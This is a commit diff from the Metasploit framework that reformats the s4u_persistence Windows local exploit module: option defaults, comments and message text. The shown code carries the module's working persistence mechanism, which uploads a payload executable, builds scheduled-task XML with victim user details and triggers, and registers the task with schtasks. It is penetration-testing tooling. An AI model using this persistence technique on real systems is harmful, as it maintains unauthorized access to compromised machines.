Land #2053, normalize s4u_persistence module

2013-07-03 10:55:52 -05:00 · 2013-07-03 10:55:52 -05:00 · ad83ef826c
parent d6f3cdc596 2a6056fd2a
commit ad83ef826c
1 changed files with 21 additions and 29 deletions
--- a/modules/exploits/windows/local/s4u_persistence.rb
+++ b/modules/exploits/windows/local/s4u_persistence.rb
@ -42,19 +42,19 @@ class Metasploit3 < Msf::Exploit::Local
 			'DisclosureDate' => 'Jan 2 2013', # Date of scriptjunkie's blog post
 			'DefaultTarget' => 0,
 			'References'     => [
-				[ 'URL', 'http://www.pentestgeek.com/2013/02/11/scheduled-tasks-with-s4u-and-on-demand-persistence/'],
-				[ 'URL', 'http://www.scriptjunkie.us/2013/01/running-code-from-a-non-elevated-account-at-any-time/']
+				[ 'URL', 'http://www.pentestgeek.com/2013/02/11/scheduled-tasks-with-s4u-and-on-demand-persistence/' ],
+				[ 'URL', 'http://www.scriptjunkie.us/2013/01/running-code-from-a-non-elevated-account-at-any-time/' ]
 			]
 		))

 		register_options(
 			[
 				OptInt.new('FREQUENCY', [false, 'Schedule trigger: Frequency in minutes to execute']),
-				OptInt.new('EXPIRE_TIME', [false, 'Number of minutes until trigger expires']),
-				OptEnum.new('TRIGGER', [true, 'Payload trigger method', 'schedule',['logon', 'lock', 'unlock','schedule', 'event']]),
-				OptString.new('REXENAME',[false, 'Name of exe on remote system']),
-				OptString.new('RTASKNAME',[false, 'Name of exe on remote system']),
-				OptString.new('PATH',[false, 'PATH to write payload'])
+				OptInt.new('EXPIRE_TIME', [false, 'Number of minutes until trigger expires', '0']),
+				OptEnum.new('TRIGGER', [true, 'Payload trigger method', 'schedule',['event', 'lock', 'logon', 'schedule', 'unlock']]),
+				OptString.new('REXENAME', [false, 'Name of exe on remote system']),
+				OptString.new('RTASKNAME', [false, 'Name of task on remote system']),
+				OptString.new('PATH', [false, 'PATH to write payload', '%TEMP%'])
 			], self.class)

 		register_advanced_options(
@ -108,7 +108,6 @@ class Metasploit3 < Msf::Exploit::Local
 	##############################################################
 	# Generate name for payload
 	# Returns name
-
 	def generate_rexename
 		rexename = datastore['REXENAME'] || Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
 		if not rexename =~ /\.exe$/
@ -119,10 +118,9 @@ class Metasploit3 < Msf::Exploit::Local

 	##############################################################
 	# Generate Path for payload upload
-	# Returns path for xml and payload
-
+	# Returns path for XML and payload
 	def generate_path(rexename)
-		# generate a path to write payload and xml
+		# Generate a path to write payload and XML
 		path = datastore['PATH'] || expand_path("%TEMP%")
 		xml_path = "#{path}\\#{Rex::Text.rand_text_alpha((rand(8)+6))}.xml"
 		rexe_path = "#{path}\\#{rexename}"
@ -132,24 +130,25 @@ class Metasploit3 < Msf::Exploit::Local
 	##############################################################
 	# Upload the executable payload
 	# Returns boolean for success
-
 	def upload_rexe(path, payload)
-			vprint_status("Uploading #{path}")
-			if file? path
-				fail_with(Exploit::Failure::Unknown, "File #{path} already exists...exiting")
-			end
+		vprint_status("Uploading #{path}")
+
+		if file? path
+			fail_with(Exploit::Failure::Unknown, "File #{path} already exists... Exiting")
+		end
+
 		begin
 			write_file(path, payload)
 		rescue => e
 			fail_with(Exploit::Failure::Unknown, "Could not upload to #{path}")
 		end
+
 		print_status("Successfully uploaded remote executable to #{path}")
 	end

 	##############################################################
 	# Creates a scheduled task, exports as XML, deletes task
 	# Returns normal XML for generic task
-
 	def create_xml(rexe_path)
 		xml_path = File.join(Msf::Config.install_root, "data", "exploits", "s4u_persistence.xml")
 		xml_file = File.new(xml_path,"r")
@ -162,18 +161,18 @@ class Metasploit3 < Msf::Exploit::Local
 			ut = vt['lpSystemTime'].unpack("v*")
 			t = ::Time.utc(ut[0],ut[1],ut[3],ut[4],ut[5])
 		rescue
-			print_warning("Could not read system time from victim...using your local time to determine creation date")
+			print_warning("Could not read system time from victim... Using your local time to determine creation date")
 			t = ::Time.now
 		end
 		date = t.strftime("%Y-%m-%d")
 		time = t.strftime("%H:%M:%S")

-		# put in correct times
+		# Put in correct times
 		xml = xml.gsub(/DATEHERE/, "#{date}T#{time}")

 		domain, user = client.sys.config.getuid.split('\\')

-		# put in user information
+		# Put in user information
 		xml = xml.sub(/DOMAINHERE/, user)
 		xml = xml.sub(/USERHERE/, "#{domain}\\#{user}")

@ -185,7 +184,6 @@ class Metasploit3 < Msf::Exploit::Local
 	# Takes the XML, alters it based on trigger specified. Will also
 	# add in expiration tag if used.
 	# Returns the modified XML
-
 	def add_xml_triggers(xml)
 		# Insert trigger
 		case datastore['TRIGGER']
@ -237,7 +235,6 @@ class Metasploit3 < Msf::Exploit::Local
 	##############################################################
 	# Creates end boundary tag which expires the trigger
 	# Returns XML for expire
-
 	def create_expire_tag()
 		# Get local time, not system time from victim machine
 		begin
@ -245,7 +242,7 @@ class Metasploit3 < Msf::Exploit::Local
 			ut = vt['lpSystemTime'].unpack("v*")
 			t = ::Time.utc(ut[0],ut[1],ut[3],ut[4],ut[5])
 		rescue
-			print_error("Could not read system time from victim...using your local time to determine expire date")
+			print_error("Could not read system time from victim... Using your local time to determine expire date")
 			t = ::Time.now
 		end

@ -261,7 +258,6 @@ class Metasploit3 < Msf::Exploit::Local
 	# Creates trigger XML for session state triggers and replaces
 	# the time trigger.
 	# Returns altered XML
-
 	def create_trigger_tags(trig, xml)
 		domain, user = client.sys.config.getuid.split('\\')

@ -283,7 +279,6 @@ class Metasploit3 < Msf::Exploit::Local
 	# Creates trigger XML for event based triggers and replaces
 	# the time trigger.
 	# Returns altered XML
-
 	def create_trigger_event_tags(log, line, xml)
 		# Fscked up XML syntax for windows event #{id} in #{log}, weird spacind
 		# used to maintain natural Windows spacing for XML export
@ -304,11 +299,10 @@ class Metasploit3 < Msf::Exploit::Local
 	##############################################################
 	# Takes the XML and a path and writes file to filesystem
 	# Returns boolean for success
-
 	def write_xml(xml, path, rexe_path)
 		if file? path
 			delete_file(rexe_path)
-			fail_with(Exploit::Failure::Unknown, "File #{path} already exists...exiting")
+			fail_with(Exploit::Failure::Unknown, "File #{path} already exists... Exiting")
 		end
 		begin
 			write_file(path, xml)
@ -322,7 +316,6 @@ class Metasploit3 < Msf::Exploit::Local
 	##############################################################
 	# Takes path and delete file
 	# Returns boolean for success
-
 	def delete_file(path)
 		begin
 			file_rm(path)
@ -334,7 +327,6 @@ class Metasploit3 < Msf::Exploit::Local
 	##############################################################
 	# Takes path and name for task and creates final task
 	# Returns boolean for success
-
 	def create_task(path, schname, rexe_path)
 		# create task using XML file on victim fs
 		create_task_response = cmd_exec("cmd.exe", "/c schtasks /create /xml #{path} /tn \"#{schname}\"")